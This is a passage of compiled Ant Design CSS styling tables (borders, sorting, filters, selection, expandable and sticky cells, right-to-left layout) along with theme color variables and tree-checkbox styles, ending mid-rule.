.ant-table.ant-table-bordered > .ant-table-container > .ant-table-content > table > thead > tr > th, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-header > table > thead > tr > th, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-body > table > thead > tr > th, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-summary > table > thead > tr > th, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-content > table > tbody > tr > td, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-header > table > tbody > tr > td, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-body > table > tbody > tr > td, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-summary > table > tbody > tr > td, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-content > table > tfoot > tr > th, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-header > table > tfoot > tr > th, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-body > table > tfoot > tr > th, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-summary > table > tfoot > tr > th, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-content > table > tfoot > tr > td, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-header > table > tfoot > tr > td, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-body > table > tfoot > tr > td, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-summary > table > tfoot > tr > td { border-right: 1px solid #f0f0f0; } .ant-table.ant-table-bordered > .ant-table-container > .ant-table-content > table > thead > tr:not(:last-child) > th, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-header > table > thead > tr:not(:last-child) > th, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-body > table > thead > tr:not(:last-child) > th, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-summary > table > thead > tr:not(:last-child) > th { border-bottom: 1px solid #f0f0f0; } .ant-table.ant-table-bordered > .ant-table-container > .ant-table-content > table > thead > tr > th::before, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-header > table > thead > tr > th::before, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-body > table > thead > tr > th::before, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-summary > table > thead > tr > th::before { background-color: transparent !important; } .ant-table.ant-table-bordered > .ant-table-container > .ant-table-content > table > thead > tr > .ant-table-cell-fix-right-first::after, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-header > table > thead > tr > .ant-table-cell-fix-right-first::after, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-body > table > thead > tr > .ant-table-cell-fix-right-first::after, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-summary > table > thead > tr > .ant-table-cell-fix-right-first::after, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-content > table > tbody > tr > .ant-table-cell-fix-right-first::after, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-header > table > tbody > tr > .ant-table-cell-fix-right-first::after, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-body > table > tbody > tr > .ant-table-cell-fix-right-first::after, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-summary > table > tbody > tr > .ant-table-cell-fix-right-first::after, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-content > table > tfoot > tr > .ant-table-cell-fix-right-first::after, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-header > table > tfoot > tr > .ant-table-cell-fix-right-first::after, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-body > table > tfoot > tr > .ant-table-cell-fix-right-first::after, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-summary > table > tfoot > tr > .ant-table-cell-fix-right-first::after { border-right: 1px solid #f0f0f0; } .ant-table.ant-table-bordered > .ant-table-container > .ant-table-content > table > tbody > tr > td > .ant-table-expanded-row-fixed, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-header > table > tbody > tr > td > .ant-table-expanded-row-fixed, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-body > table > tbody > tr > td > .ant-table-expanded-row-fixed, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-summary > table > tbody > tr > td > .ant-table-expanded-row-fixed { margin: -16px -17px; } .ant-table.ant-table-bordered > .ant-table-container > .ant-table-content > table > tbody > tr > td > .ant-table-expanded-row-fixed::after, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-header > table > tbody > tr > td > .ant-table-expanded-row-fixed::after, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-body > table > tbody > tr > td > .ant-table-expanded-row-fixed::after, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-summary > table > tbody > tr > td > .ant-table-expanded-row-fixed::after { position: absolute; top: 0; right: 1px; bottom: 0; border-right: 1px solid #f0f0f0; content: ''; } .ant-table.ant-table-bordered > .ant-table-container > .ant-table-content > table, .ant-table.ant-table-bordered > .ant-table-container > .ant-table-header > table { border-top: 1px solid #f0f0f0; } .ant-table.ant-table-bordered.ant-table-scroll-horizontal > .ant-table-container > .ant-table-body > table > tbody > tr.ant-table-expanded-row > td, .ant-table.ant-table-bordered.ant-table-scroll-horizontal > .ant-table-container > .ant-table-body > table > tbody > tr.ant-table-placeholder > td { border-right: 0; } .ant-table.ant-table-bordered.ant-table-middle > .ant-table-container > .ant-table-content > table > tbody > tr > td > .ant-table-expanded-row-fixed, .ant-table.ant-table-bordered.ant-table-middle > .ant-table-container > .ant-table-body > table > tbody > tr > td > .ant-table-expanded-row-fixed { margin: -12px -9px; } .ant-table.ant-table-bordered.ant-table-small > .ant-table-container > .ant-table-content > table > tbody > tr > td > .ant-table-expanded-row-fixed, .ant-table.ant-table-bordered.ant-table-small > .ant-table-container > .ant-table-body > table > tbody > tr > td > .ant-table-expanded-row-fixed { margin: -8px -9px; } .ant-table.ant-table-bordered > .ant-table-footer { border: 1px solid #f0f0f0; border-top: 0; } .ant-table-cell .ant-table-container:first-child { border-top: 0; } .ant-table-cell-scrollbar { box-shadow: 0 1px 0 1px #fafafa; } .ant-table-wrapper { clear: both; max-width: 100%; } .ant-table-wrapper::before { display: table; content: ''; } .ant-table-wrapper::after { display: table; clear: both; content: ''; } .ant-table { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: relative; font-size: 14px; background: #fff; border-radius: 2px; } .ant-table table { width: 100%; text-align: left; border-radius: 2px 2px 0 0; border-collapse: separate; border-spacing: 0; } .ant-table-thead > tr > th, .ant-table-tbody > tr > td, .ant-table tfoot > tr > th, .ant-table tfoot > tr > td { position: relative; padding: 16px 16px; overflow-wrap: break-word; } .ant-table-cell-ellipsis { overflow: hidden; white-space: nowrap; text-overflow: ellipsis; word-break: keep-all; } .ant-table-cell-ellipsis.ant-table-cell-fix-left-last, .ant-table-cell-ellipsis.ant-table-cell-fix-right-first { overflow: visible; } .ant-table-cell-ellipsis.ant-table-cell-fix-left-last .ant-table-cell-content, .ant-table-cell-ellipsis.ant-table-cell-fix-right-first .ant-table-cell-content { display: block; overflow: hidden; text-overflow: ellipsis; } .ant-table-cell-ellipsis .ant-table-column-title { overflow: hidden; text-overflow: ellipsis; word-break: keep-all; } .ant-table-title { padding: 16px 16px; } .ant-table-footer { padding: 16px 16px; color: rgba(0, 0, 0, 0.85); background: #fafafa; } .ant-table-thead > tr > th { position: relative; color: rgba(0, 0, 0, 0.85); font-weight: 500; text-align: left; background: #fafafa; border-bottom: 1px solid #f0f0f0; transition: background 0.3s ease; } .ant-table-thead > tr > th[colspan]:not([colspan='1']) { text-align: center; } .ant-table-thead > tr > th:not(:last-child):not(.ant-table-selection-column):not(.ant-table-row-expand-icon-cell):not([colspan])::before { position: absolute; top: 50%; right: 0; width: 1px; height: 1.6em; background-color: rgba(0, 0, 0, 0.06); transform: translateY(-50%); transition: background-color 0.3s; content: ''; } .ant-table-thead > tr:not(:last-child) > th[colspan] { border-bottom: 0; } .ant-table-tbody > tr > td { border-bottom: 1px solid #f0f0f0; transition: background 0.3s; } .ant-table-tbody > tr > td > .ant-table-wrapper:only-child .ant-table, .ant-table-tbody > tr > td > .ant-table-expanded-row-fixed > .ant-table-wrapper:only-child .ant-table { margin: -16px -16px -16px 33px; } .ant-table-tbody > tr > td > .ant-table-wrapper:only-child .ant-table-tbody > tr:last-child > td, .ant-table-tbody > tr > td > .ant-table-expanded-row-fixed > .ant-table-wrapper:only-child .ant-table-tbody > tr:last-child > td { border-bottom: 0; } .ant-table-tbody > tr > td > .ant-table-wrapper:only-child .ant-table-tbody > tr:last-child > td:first-child, .ant-table-tbody > tr > td > .ant-table-expanded-row-fixed > .ant-table-wrapper:only-child .ant-table-tbody > tr:last-child > td:first-child, .ant-table-tbody > tr > td > .ant-table-wrapper:only-child .ant-table-tbody > tr:last-child > td:last-child, .ant-table-tbody > tr > td > .ant-table-expanded-row-fixed > .ant-table-wrapper:only-child .ant-table-tbody > tr:last-child > td:last-child { border-radius: 0; } .ant-table-tbody > tr.ant-table-row:hover > td, .ant-table-tbody > tr > td.ant-table-cell-row-hover { background: #fafafa; } .ant-table-tbody > tr.ant-table-row-selected > td { background: var(--ant-primary-1); border-color: rgba(0, 0, 0, 0.03); } .ant-table-tbody > tr.ant-table-row-selected:hover > td { background: var(--ant-primary-color-active-deprecated-d-02); } .ant-table-summary { position: relative; z-index: 2; background: #fff; } div.ant-table-summary { box-shadow: 0 -1px 0 #f0f0f0; } .ant-table-summary > tr > th, .ant-table-summary > tr > td { border-bottom: 1px solid #f0f0f0; } .ant-table-pagination.ant-pagination { margin: 16px 0; } .ant-table-pagination { display: flex; flex-wrap: wrap; row-gap: 8px; } .ant-table-pagination > * { flex: none; } .ant-table-pagination-left { justify-content: flex-start; } .ant-table-pagination-center { justify-content: center; } .ant-table-pagination-right { justify-content: flex-end; } .ant-table-thead th.ant-table-column-has-sorters { cursor: pointer; transition: all 0.3s; } .ant-table-thead th.ant-table-column-has-sorters:hover { background: rgba(0, 0, 0, 0.04); } .ant-table-thead th.ant-table-column-has-sorters:hover::before { background-color: transparent !important; } .ant-table-thead th.ant-table-column-has-sorters.ant-table-cell-fix-left:hover, .ant-table-thead th.ant-table-column-has-sorters.ant-table-cell-fix-right:hover { background: #f5f5f5; } .ant-table-thead th.ant-table-column-sort { background: #f5f5f5; } .ant-table-thead th.ant-table-column-sort::before { background-color: transparent !important; } td.ant-table-column-sort { background: #fafafa; } .ant-table-column-title { position: relative; z-index: 1; flex: 1; } .ant-table-column-sorters { display: flex; flex: auto; align-items: center; justify-content: space-between; } .ant-table-column-sorters::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; width: 100%; height: 100%; content: ''; } .ant-table-column-sorter { margin-left: 4px; color: #bfbfbf; font-size: 0; transition: color 0.3s; } .ant-table-column-sorter-inner { display: inline-flex; flex-direction: column; align-items: center; } .ant-table-column-sorter-up, .ant-table-column-sorter-down { font-size: 11px; } .ant-table-column-sorter-up.active, .ant-table-column-sorter-down.active { color: var(--ant-primary-color); } .ant-table-column-sorter-up + .ant-table-column-sorter-down { margin-top: -0.3em; } .ant-table-column-sorters:hover .ant-table-column-sorter { color: #a6a6a6; } .ant-table-filter-column { display: flex; justify-content: space-between; } .ant-table-filter-trigger { position: relative; display: flex; align-items: center; margin: -4px -8px -4px 4px; padding: 0 4px; color: #bfbfbf; font-size: 12px; border-radius: 2px; cursor: pointer; transition: all 0.3s; } .ant-table-filter-trigger:hover { color: rgba(0, 0, 0, 0.45); background: rgba(0, 0, 0, 0.04); } .ant-table-filter-trigger.active { color: var(--ant-primary-color); } .ant-table-filter-dropdown { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; min-width: 120px; background-color: #fff; border-radius: 2px; box-shadow: 0 3px 6px -4px rgba(0, 0, 0, 0.12), 0 6px 16px 0 rgba(0, 0, 0, 0.08), 0 9px 28px 8px rgba(0, 0, 0, 0.05); } .ant-table-filter-dropdown .ant-dropdown-menu { max-height: 264px; overflow-x: hidden; border: 0; box-shadow: none; } .ant-table-filter-dropdown .ant-dropdown-menu:empty::after { display: block; padding: 8px 0; color: rgba(0, 0, 0, 0.25); font-size: 12px; text-align: center; content: 'Not Found'; } .ant-table-filter-dropdown-tree { padding: 8px 8px 0; } .ant-table-filter-dropdown-tree .ant-tree-treenode .ant-tree-node-content-wrapper:hover { background-color: #f5f5f5; } .ant-table-filter-dropdown-tree .ant-tree-treenode-checkbox-checked .ant-tree-node-content-wrapper, .ant-table-filter-dropdown-tree .ant-tree-treenode-checkbox-checked .ant-tree-node-content-wrapper:hover { background-color: var(--ant-primary-2); } .ant-table-filter-dropdown-search { padding: 8px; border-bottom: 1px #f0f0f0 solid; } .ant-table-filter-dropdown-search-input input { min-width: 140px; } .ant-table-filter-dropdown-search-input .anticon { color: rgba(0, 0, 0, 0.25); } .ant-table-filter-dropdown-checkall { width: 100%; margin-bottom: 4px; margin-left: 4px; } .ant-table-filter-dropdown-submenu > ul { max-height: calc(100vh - 130px); overflow-x: hidden; overflow-y: auto; } .ant-table-filter-dropdown .ant-checkbox-wrapper + span, .ant-table-filter-dropdown-submenu .ant-checkbox-wrapper + span { padding-left: 8px; } .ant-table-filter-dropdown-btns { display: flex; justify-content: space-between; padding: 7px 8px; overflow: hidden; background-color: inherit; border-top: 1px solid #f0f0f0; } .ant-table-selection-col { width: 32px; } .ant-table-bordered .ant-table-selection-col { width: 50px; } table tr th.ant-table-selection-column, table tr td.ant-table-selection-column { padding-right: 8px; padding-left: 8px; text-align: center; } table tr th.ant-table-selection-column .ant-radio-wrapper, table tr td.ant-table-selection-column .ant-radio-wrapper { margin-right: 0; } table tr th.ant-table-selection-column.ant-table-cell-fix-left { z-index: 3; } table tr th.ant-table-selection-column::after { background-color: transparent !important; } .ant-table-selection { position: relative; display: inline-flex; flex-direction: column; } .ant-table-selection-extra { position: absolute; top: 0; z-index: 1; cursor: pointer; transition: all 0.3s; -webkit-margin-start: 100%; margin-inline-start: 100%; -webkit-padding-start: 4px; padding-inline-start: 4px; } .ant-table-selection-extra .anticon { color: #bfbfbf; font-size: 10px; } .ant-table-selection-extra .anticon:hover { color: #a6a6a6; } .ant-table-expand-icon-col { width: 48px; } .ant-table-row-expand-icon-cell { text-align: center; } .ant-table-row-indent { float: left; height: 1px; } .ant-table-row-expand-icon { color: var(--ant-primary-color); text-decoration: none; cursor: pointer; transition: color 0.3s; position: relative; display: inline-flex; float: left; box-sizing: border-box; width: 17px; height: 17px; padding: 0; color: inherit; line-height: 17px; background: #fff; border: 1px solid #f0f0f0; border-radius: 2px; outline: none; transform: scale(0.94117647); transition: all 0.3s; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-table-row-expand-icon:focus, .ant-table-row-expand-icon:hover { color: var(--ant-primary-color-hover); } .ant-table-row-expand-icon:active { color: var(--ant-primary-color-active); } .ant-table-row-expand-icon:focus, .ant-table-row-expand-icon:hover, .ant-table-row-expand-icon:active { border-color: currentColor; } .ant-table-row-expand-icon::before, .ant-table-row-expand-icon::after { position: absolute; background: currentColor; transition: transform 0.3s ease-out; content: ''; } .ant-table-row-expand-icon::before { top: 7px; right: 3px; left: 3px; height: 1px; } .ant-table-row-expand-icon::after { top: 3px; bottom: 3px; left: 7px; width: 1px; transform: rotate(90deg); } .ant-table-row-expand-icon-collapsed::before { transform: rotate(-180deg); } .ant-table-row-expand-icon-collapsed::after { transform: rotate(0deg); } .ant-table-row-expand-icon-spaced { background: transparent; border: 0; visibility: hidden; } .ant-table-row-expand-icon-spaced::before, .ant-table-row-expand-icon-spaced::after { display: none; content: none; } .ant-table-row-indent + .ant-table-row-expand-icon { margin-top: 2.5005px; margin-right: 8px; } tr.ant-table-expanded-row > td, tr.ant-table-expanded-row:hover > td { background: #fbfbfb; } tr.ant-table-expanded-row .ant-descriptions-view { display: flex; } tr.ant-table-expanded-row .ant-descriptions-view table { flex: auto; width: auto; } .ant-table .ant-table-expanded-row-fixed { position: relative; margin: -16px -16px; padding: 16px 16px; } .ant-table-tbody > tr.ant-table-placeholder { text-align: center; } .ant-table-empty .ant-table-tbody > tr.ant-table-placeholder { color: rgba(0, 0, 0, 0.25); } .ant-table-tbody > tr.ant-table-placeholder:hover > td { background: #fff; } .ant-table-cell-fix-left, .ant-table-cell-fix-right { position: -webkit-sticky !important; position: sticky !important; z-index: 2; background: #fff; } .ant-table-cell-fix-left-first::after, .ant-table-cell-fix-left-last::after { position: absolute; top: 0; right: 0; bottom: -1px; width: 30px; transform: translateX(100%); transition: box-shadow 0.3s; content: ''; pointer-events: none; } .ant-table-cell-fix-right-first::after, .ant-table-cell-fix-right-last::after { position: absolute; top: 0; bottom: -1px; left: 0; width: 30px; transform: translateX(-100%); transition: box-shadow 0.3s; content: ''; pointer-events: none; } .ant-table .ant-table-container::before, .ant-table .ant-table-container::after { position: absolute; top: 0; bottom: 0; z-index: 1; width: 30px; transition: box-shadow 0.3s; content: ''; pointer-events: none; } .ant-table .ant-table-container::before { left: 0; } .ant-table .ant-table-container::after { right: 0; } .ant-table-ping-left:not(.ant-table-has-fix-left) .ant-table-container { position: relative; } .ant-table-ping-left:not(.ant-table-has-fix-left) .ant-table-container::before { box-shadow: inset 10px 0 8px -8px rgba(0, 0, 0, 0.15); } .ant-table-ping-left .ant-table-cell-fix-left-first::after, .ant-table-ping-left .ant-table-cell-fix-left-last::after { box-shadow: inset 10px 0 8px -8px rgba(0, 0, 0, 0.15); } .ant-table-ping-left .ant-table-cell-fix-left-last::before { background-color: transparent !important; } .ant-table-ping-right:not(.ant-table-has-fix-right) .ant-table-container { position: relative; } .ant-table-ping-right:not(.ant-table-has-fix-right) .ant-table-container::after { box-shadow: inset -10px 0 8px -8px rgba(0, 0, 0, 0.15); } .ant-table-ping-right .ant-table-cell-fix-right-first::after, .ant-table-ping-right .ant-table-cell-fix-right-last::after { box-shadow: inset -10px 0 8px -8px rgba(0, 0, 0, 0.15); } .ant-table-sticky-holder { position: -webkit-sticky; position: sticky; z-index: calc(2 + 1); background: #fff; } .ant-table-sticky-scroll { position: -webkit-sticky; position: sticky; bottom: 0; z-index: calc(2 + 1); display: flex; align-items: center; background: #ffffff; border-top: 1px solid #f0f0f0; opacity: 0.6; } .ant-table-sticky-scroll:hover { transform-origin: center bottom; } .ant-table-sticky-scroll-bar { height: 8px; background-color: rgba(0, 0, 0, 0.35); border-radius: 4px; } .ant-table-sticky-scroll-bar:hover { background-color: rgba(0, 0, 0, 0.8); } .ant-table-sticky-scroll-bar-active { background-color: rgba(0, 0, 0, 0.8); } @media all and (-ms-high-contrast: none) { .ant-table-ping-left .ant-table-cell-fix-left-last::after { box-shadow: none !important; } .ant-table-ping-right .ant-table-cell-fix-right-first::after { box-shadow: none !important; } } .ant-table { /* title + table */ /* table */ /* table + footer */ } .ant-table-title { border-radius: 2px 2px 0 0; } .ant-table-title + .ant-table-container { border-top-left-radius: 0; border-top-right-radius: 0; } .ant-table-title + .ant-table-container table > thead > tr:first-child th:first-child { border-radius: 0; } .ant-table-title + .ant-table-container table > thead > tr:first-child th:last-child { border-radius: 0; } .ant-table-container { border-top-left-radius: 2px; border-top-right-radius: 2px; } .ant-table-container table > thead > tr:first-child th:first-child { border-top-left-radius: 2px; } .ant-table-container table > thead > tr:first-child th:last-child { border-top-right-radius: 2px; } .ant-table-footer { border-radius: 0 0 2px 2px; } .ant-table-wrapper-rtl { direction: rtl; } .ant-table-rtl { direction: rtl; } .ant-table-wrapper-rtl .ant-table table { text-align: right; } .ant-table-wrapper-rtl .ant-table-thead > tr > th[colspan]:not([colspan='1']) { text-align: center; } .ant-table-wrapper-rtl .ant-table-thead > tr > th:not(:last-child):not(.ant-table-selection-column):not(.ant-table-row-expand-icon-cell):not([colspan])::before { right: auto; left: 0; } .ant-table-wrapper-rtl .ant-table-thead > tr > th { text-align: right; } .ant-table-tbody > tr .ant-table-wrapper:only-child .ant-table.ant-table-rtl { margin: -16px 33px -16px -16px; } .ant-table-wrapper.ant-table-wrapper-rtl .ant-table-pagination-left { justify-content: flex-end; } .ant-table-wrapper.ant-table-wrapper-rtl .ant-table-pagination-right { justify-content: flex-start; } .ant-table-wrapper-rtl .ant-table-column-sorter { margin-right: 4px; margin-left: 0; } .ant-table-wrapper-rtl .ant-table-filter-column-title { padding: 16px 16px 16px 2.3em; } .ant-table-rtl .ant-table-thead tr th.ant-table-column-has-sorters .ant-table-filter-column-title { padding: 0 0 0 2.3em; } .ant-table-wrapper-rtl .ant-table-filter-trigger { margin: -4px 4px -4px -8px; } .ant-dropdown-rtl .ant-table-filter-dropdown .ant-checkbox-wrapper + span, .ant-dropdown-rtl .ant-table-filter-dropdown-submenu .ant-checkbox-wrapper + span, .ant-dropdown-menu-submenu-rtl.ant-table-filter-dropdown .ant-checkbox-wrapper + span, .ant-dropdown-menu-submenu-rtl.ant-table-filter-dropdown-submenu .ant-checkbox-wrapper + span { padding-right: 8px; padding-left: 0; } .ant-table-wrapper-rtl .ant-table-selection { text-align: center; } .ant-table-wrapper-rtl .ant-table-row-indent { float: right; } .ant-table-wrapper-rtl .ant-table-row-expand-icon { float: right; } .ant-table-wrapper-rtl .ant-table-row-indent + .ant-table-row-expand-icon { margin-right: 0; margin-left: 8px; } .ant-table-wrapper-rtl .ant-table-row-expand-icon::after { transform: rotate(-90deg); } .ant-table-wrapper-rtl .ant-table-row-expand-icon-collapsed::before { transform: rotate(180deg); } .ant-table-wrapper-rtl .ant-table-row-expand-icon-collapsed::after { transform: rotate(0deg); } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } @-webkit-keyframes antCheckboxEffect { 0% { transform: scale(1); opacity: 0.5; } 100% { transform: scale(1.6); opacity: 0; } } @keyframes antCheckboxEffect { 0% { transform: scale(1); opacity: 0.5; } 100% { transform: scale(1.6); opacity: 0; } } @-webkit-keyframes ant-tree-node-fx-do-not-use { 0% { opacity: 0; } 100% { opacity: 1; } } @keyframes ant-tree-node-fx-do-not-use { 0% { opacity: 0; } 100% { opacity: 1; } } .ant-tree.ant-tree-directory .ant-tree-treenode { position: relative; } .ant-tree.ant-tree-directory .ant-tree-treenode::before { position: absolute; top: 0; right: 0; bottom: 4px; left: 0; transition: background-color 0.3s; content: ''; pointer-events: none; } .ant-tree.ant-tree-directory .ant-tree-treenode:hover::before { background: #f5f5f5; } .ant-tree.ant-tree-directory .ant-tree-treenode > * { z-index: 1; } .ant-tree.ant-tree-directory .ant-tree-treenode .ant-tree-switcher { transition: color 0.3s; } .ant-tree.ant-tree-directory .ant-tree-treenode .ant-tree-node-content-wrapper { border-radius: 0; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-tree.ant-tree-directory .ant-tree-treenode .ant-tree-node-content-wrapper:hover { background: transparent; } .ant-tree.ant-tree-directory .ant-tree-treenode .ant-tree-node-content-wrapper.ant-tree-node-selected { color: #fff; background: transparent; } .ant-tree.ant-tree-directory .ant-tree-treenode-selected:hover::before, .ant-tree.ant-tree-directory .ant-tree-treenode-selected::before { background: var(--ant-primary-color); } .ant-tree.ant-tree-directory .ant-tree-treenode-selected .ant-tree-switcher { color: #fff; } .ant-tree.ant-tree-directory .ant-tree-treenode-selected .ant-tree-node-content-wrapper { color: #fff; background: transparent; } .ant-tree-checkbox { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: relative; top: 0.2em; line-height: 1; white-space: nowrap; outline: none; cursor: pointer; } .ant-tree-checkbox-wrapper:hover .ant-tree-checkbox-inner, .ant-tree-checkbox:hover .ant-tree-checkbox-inner, .ant-tree-checkbox-input:focus + .ant-tree-checkbox-inner { border-color: var(--ant-primary-color); } .ant-tree-checkbox-checked::after { position: absolute; top: 0; left: 0; width: 100%; height: 100%; border: 1px solid var(--ant-primary-color); border-radius: 2px; visibility: hidden; -webkit-animation: antCheckboxEffect 0.36s ease-in-out; animation: antCheckboxEffect 0.36s ease-in-out; -webkit-animation-fill-mode: backwards; animation-fill-mode: backwards; content: ''; } .ant-tree-checkbox:hover::after, .ant-tree-checkbox-wrapper:hover .ant-tree-checkbox::after { visibility: visible; } .ant-tree-checkbox-inner { position: relative; top: 0; left: 0; display: block; width: 16px; height: 16px; direction: ltr; background-color: #fff; border: 1px solid #d9d9d9; border-radius: 2px; border-collapse: separate; transition: all 0.3s; } .ant-tree-checkbox-inner::after { position: absolute; top: 50%; left: 21.5%; display: table; width: 5.71428571px; height: 9.14285714px; border: 2px solid #fff; border-top: 0; border-left: 0; transform: rotate(45deg) scale(0) translate(-50%, -50%); opacity: 0; transition: all 0.1s cubic-bezier(0.71, -0.46, 0.88, 0.6), opacity 0.1s; content: ' '; } .ant-tree-checkbox-input { position: absolute; top: 0; right: 0; bottom: 0; left: 0; z-index: 1; width: 100%; height: 100%; cursor: pointer; opacity: 0; } .ant-tree-checkbox-checked .ant-tree-checkbox-inner::after { position: absolute; display: table; border: 2px solid #fff; border-top: 0; border-left: 0; transform: rotate(45deg) scale(1) translate(-50%, -50%); opacity: 1; transition: all 0.2s cubic-bezier(0.12, 0.4, 0.29, 1.46) 0.1s; content: ' '; } .ant-tree-checkbox-checked .ant-tree-checkbox-inner { background-color: var(--ant-primary-color); border-color: var(--ant-primary-color); } .ant-tree-checkbox-disabled { cursor: not-allowed; } .ant-tree-checkbox-disabled.ant-tree-checkbox-checked .ant-tree-checkbox-inner::after { border-color: rgba(0, 0, 0, 0.25); -webkit-animation-name: none; animation-name: none; } .ant-tree-checkbox-disabled .ant-tree-checkbox-input { cursor: not-allowed; } .ant-tree-checkbox-disabled .ant-tree-checkbox-inner { background-color: #f5f5f5; border-color: #d9d9d9 !important; } .ant-tree-checkbox-disabled .ant-tree-checkbox-inner::after { border-color: #f5f5f5; border-collapse: separate; -webkit-animation-name: none; animation-name: none; } .ant-tree-checkbox-disabled + span { color: rgba(0, 0, 0, 0.25); cursor: not-allowed; } .ant-tree-checkbox-disabled:hover::after, .ant-tree-checkbox-wrapper:hover .ant-tree-checkbox-disabled::after { visibility: hidden; } .ant-tree-checkbox-wrapper { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; display: inline-flex; align-items: baseline; line-height: unset; cursor: pointer; } .ant-tree-checkbox-wrapper::after { display: inline-block; width: 0; overflow: hidden; content: '\a0'; } .ant-tree-checkbox-wrapper.ant-tree-checkbox-wrapper-disabled { cursor: not-allowed; } .ant-tree-checkbox-wrapper + .ant-tree-checkbox-wrapper { margin-left: 8px; } .ant-tree-checkbox + span { padding-right: 8px; padding-left: 8px; } .ant-tree-checkbox-group { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; display: inline-block; } .ant-tree-checkbox-group-item { margin-right: 8px; } .ant-tree-checkbox-group-item:last-child { margin-right: 0; } .ant-tree-checkbox-group-item + .ant-tree-checkbox-group-item { margin-left: 0; } .ant-tree-checkbox-indeterminate .ant-tree-checkbox-inner { background-color: #fff; border-color: #d9d9d9; } .ant-tree-checkbox-indeterminate .ant-tree-checkbox-inner::after { top: 50%; left: 50%; width: 8px; height: 8px; background-color: var(--ant-primary-color); border: 0; transform: translate(-50%, -50%) scale(1); opacity: 1; content: ' '; } .ant-tree-checkbox-indeterminate.ant-tree-checkbox-disabled .ant-tree-checkbox-inner::after { background-color: rgba(0, 0, 0, 0.25); border-color: rgba(0, 0, 0, 0.25); } .ant-tree { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 